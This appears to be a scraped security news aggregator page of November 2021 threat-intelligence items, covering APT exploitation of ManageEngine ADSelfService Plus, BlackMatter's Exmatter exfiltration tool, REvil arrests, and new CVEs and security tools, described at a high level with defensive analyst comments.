US Cybersecurity and Infrastructure Security Agency (CISA) has released an alert about advanced persistent threat (APT) actors exploiting vulnerability in self-service password management and single sign-on solution known as ManageEngine ADSelfService Plus. PaloAlto, Microsoft & Lumen Technologies did a joint effort to track, analyse and mitigate this threat. The attack deployed a webshell and created a registry key for persistence. The actor leveraged leased infrastructure in the US to scan hundreds of organizations and compromised at least nine global organizations across technology, defense, healthcare and education industries.
Analyst Comment: This actor has used some unique techniques in these attacks including: a blockchain based legitimate remote control application, and credential stealing tool which hooks specific functions from the LSASS process. It’s important to make sure your EDR solution is configured to and supports detecting such advanced techniques in order to detect such attacks.
MITRE ATT&CK: [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Ingress Tool Transfer - T1105 | [MITRE ATT&CK] Scripting - T1064 | [MITRE ATT&CK] Valid Accounts - T1078 | [MITRE ATT&CK] Application Layer Protocol - T1071 | [MITRE ATT&CK] Credentials in Files - T1081 | [MITRE ATT&CK] Brute Force - T1110 | [MITRE ATT&CK] Data Staged - T1074 | [MITRE ATT&CK] External Remote Services - T1133 | [MITRE ATT&CK] Hooking - T1179 | [MITRE ATT&CK] Registry Run Keys / Startup Folder - T1060 | [MITRE ATT&CK] Pass the Hash - T1075
Tags: Threat Group 3390, APT27, TG-3390, Emissary Panda, WildFire, NGLite backdoor, Cobalt Strike, Godzilla, PwDump, beacon, ChinaChopper, CVE-2021-40539, Healthcare, Military, North America, China
REvil Affiliates Arrested; DOJ Seizes $6.1M in Ransom
(published: November 9, 2021)
A 22 year old Ukranian national named Yaroslav Vasinskyi, has been charged with conducting ransomware attacks by the U.S Department of Justice (DOJ). These attacks include t |
Ransomware Data Breach Malware Tool Vulnerability Threat Medical | APT 38 APT 27 APT 1 | |
|
2021-11-16 14:00:00 | How Nobl9\'s new tool could help developers tame technical debt (lien direct) | Commentary: Tech debt is a major hurdle to developer productivity. Nobl9's new Hydrogen is here to help. | Tool | ||
|
2021-11-16 13:16:47 | BlackMatter Uses New Custom Data Exfiltration Tool (lien direct) | FortiGuard Labs is aware that a BlackMatter ransomware affiliate started to use a new custom data exfiltration tool called "Exmatter". The tool is used to steal specific file types from predetermined directories and upload them to an attacker's server. This process happens before the ransomware is deployed to the victim's network.Why is this Significant?This is significant because Exmatter appears to target specific file types which the attacker thinks are valuable so it can steal them as quickly as possible. That allows the attacker to spend less time on the network before deploying the BlackMatter ransomware.What File Types is Exmatter Designed to Steal?According to security vendor Symantec, files with the following file extensions on the compromised machine are targeted by Exmatter: .doc.docx.xls.xlsx.pdf.msg.png.ppt.pptx.sda.sdm.sdw.csv.xlsm.zip.json.config.ts.cs.js.asp.pstAre There Multiple Versions of Exmatter?According to the security vendor, there are at least four versions of Exmatter that were used by a BlackMatter affiliate. Newer versions include additional file extensions to steal, as well as specific strings in file names that Exmatter excludes from the exfiltration targets. One directory target was shortened so that Exmatter can search for more files for exfiltration. Also SFTP server details used for uploading the stolen data were updated with Webdav to serve as a backup in case the SFTP transmission did not work.What is the Significance of the Updates Made to Exmatter?It is significant because the attacker used lessons learned from the networks of previous victims to update Exmatter to make data exfiltration more efficient and effective against future victims.What does FortiGuard Labs Know About BlackMatter Ransomware?BlackMatter ransomware is a fairly new Ransomware-as-a-Service (RaaS) and was discovered in late July 2021. The group posted ads on hacking forums recruiting affiliates and asking to buy access to compromised corporate networks to deploy ransomware. FortiGuard Labs has previously released two Threat Signals on BlackMatter ransomware. See the Appendix for a link to the Threat Signal, "Meet BlackMatter: Yet Another RaaS in the Wild" and to the Threat Signal, "Joint CyberSecurity Advisory on BlackMatter Ransomware (AA21-291A)."What is the Status of Coverage?FortiGuard Labs provides the following AV coverage against Exmatter:MSIL/Agent.7AAD!trW32/Crypt!trPossibleThreatAll Network IOC's related to this threat are blocked by the FortiGuard WebFiltering Client. | Ransomware Tool Threat | ||
 |
2021-11-11 17:00:01 | Google debuts ClusterFuzzLite security tool for CI, CD workflows (lien direct) | The fuzzing solution is set to bolster software supply chain security. | Tool | ||
|
2021-11-11 16:04:21 | How to tame cloud infrastructure sprawl with open source CloudQuery (lien direct) | Commentary: The cloud makes infrastructure sprawl easier and worse than ever. Here's an open source tool to help you keep it in control. | Tool | ||
|
2021-11-11 15:42:13 | How to easily transfer files between computers with croc (lien direct) | If you're looking for an easy command-line tool to transfer files between systems on the same LAN, Jack Wallen believes croc is the tool for the job. | Tool | ||
|
2021-11-10 16:53:37 | Unity purchases Weta Digital\'s visual-effects tool suite for $1.6 billion (lien direct) | Major deal continues the slow merging of movie-creation and game-creation tools. | Tool | ||
|
2021-11-10 16:07:38 | RPC Firewall Dubbed \'Ransomware Kill Switch\' Released to Open Source (lien direct) | Today at Black Hat London, Zero Networks announced the release of its RPC firewall – also dubbed the 'ransomware kill switch' – into open source. The tool provides granular control over RPC, capable of blocking the use of lateral movement hacker tools and stopping almost all ransomware in its tracks. | Ransomware Tool | ||
|
2021-11-10 16:00:00 | Anomali Cyber Watch: GitLab Vulnerability Exploited In The Wild, Mekotio Banking Trojan Returns, Microsoft Exchange Vulnerabilities Exploited Again and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Babuk, Braktooth, Linux, Gamaredon, Magecart and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
BrakTooth Bluetooth Bugs Bite: Exploit Code, PoC Released
(published: November 5, 2021)
A proof-of-concept (PoC) tool to test for the recently revealed BrakTooth flaws in Bluetooth devices, and the researchers who discovered them have released both the test kit and full exploit code for the bugs. On Thursday, CISA urged manufacturers, vendors and developers to patch or employ workarounds. On Monday, the University of Singapore researchers updated their table of affected devices, after the chipset vendors Airoha, Mediatek and Samsung reported that some of their devices are vulnerable.
Analyst Comment: Users are urged to patch or employ workarounds as soon as possible.
Tags: Bluetooth, BrakTooth, Exploit, Vulnerability
CVE-2021-43267: Remote Linux Kernel Heap Overflow | TIPC Module Allows Arbitrary Code Execution
(published: November 4, 2021)
Researchers at SentinelOne have identified a vulnerability in the TIPC Module, part of the Linux Kernel. The Transparent Inter-Process Communication (TIPC) module is a protocol that is used for cluster-wide operation and is packaged as part of most major Linux distributions. The vulnerability, designated as “CVE-2021-43267”, is a heap overflow vulnerability that could be exploited to execute code within the kernel.
Analyst Comment: TIPC users should ensure their Linux kernel version is not between 5.10-rc1 and 5.15.
Tags: Linux, TIPC, Vulnerabiltity
Ukraine Links Members Of Gamaredon Hacker Group To Russian FSB
(published: November 4, 2021)
The Ukrainian Secret Service claims to have identified five members of the threat group, Gamaredon. The group, who Ukraine are claiming to be operated by the Russian Federal Security Service (FSB), are believed to be behind over 5,000 attacks against Ukraine. These attacks usually consist of malicious documents and using a template injection vulnerability, the group has targeted government, public and private entities.
Analyst Comment: Users should be careful that a file is sent via a known and trusted sender, that individual should be contacted to verify the authenticity of the attachment prior to opening. Thus, any such file attachment sent by unknown senders should be viewed with the utmost scrutiny, and the attachments should be avoided and properly reported to appropriate personnel. Users should be careful when viewing documents that ask for macros to be enabled.
MITRE ATT&CK: [MITRE ATT&CK] User Execution - T1204
Tags: Gamaredon, Malicious Documents, Russia, Ukraine, Template Injection
|
Ransomware Data Breach Malware Tool Vulnerability Threat | ||
 |
2021-11-10 09:27:57 | Shadow IT Makes People More Vulnerable to Phishing, (Wed, Nov 10th) (lien direct) | Shadow IT is a real problem in many organizations. Behind this term, we speak about pieces of hardware or software that are installed by users without the approval of the IT department. In many cases, shadow IT is used because internal IT teams are not able to provide tools in time. Think about a user who needs to safely exchange files with partners and no tool is available. A change request will be created to deploy one but, with the lack of (time|money|resources), the project will take time. Unfortunately, the user needs the tool now, so an alternative path will be used like a cloud file sharing service. | Tool | ||
 |
2021-11-10 00:08:40 | 14 New Security Flaws Found in BusyBox Linux Utility for Embedded Devices (lien direct) | Cybersecurity researchers on Tuesday disclosed 14 critical vulnerabilities in the BusyBox Linux utility that could be exploited to result in a denial-of-service (DoS) condition and, in select cases, even lead to information leaks and remote code execution.
The security weaknesses, tracked from CVE-2021-42373 through CVE-2021-42386, affect multiple versions of the tool ranging from 1.16-1.33.1, |
Tool Guideline |
To see everything:
Our RSS (filtrered)
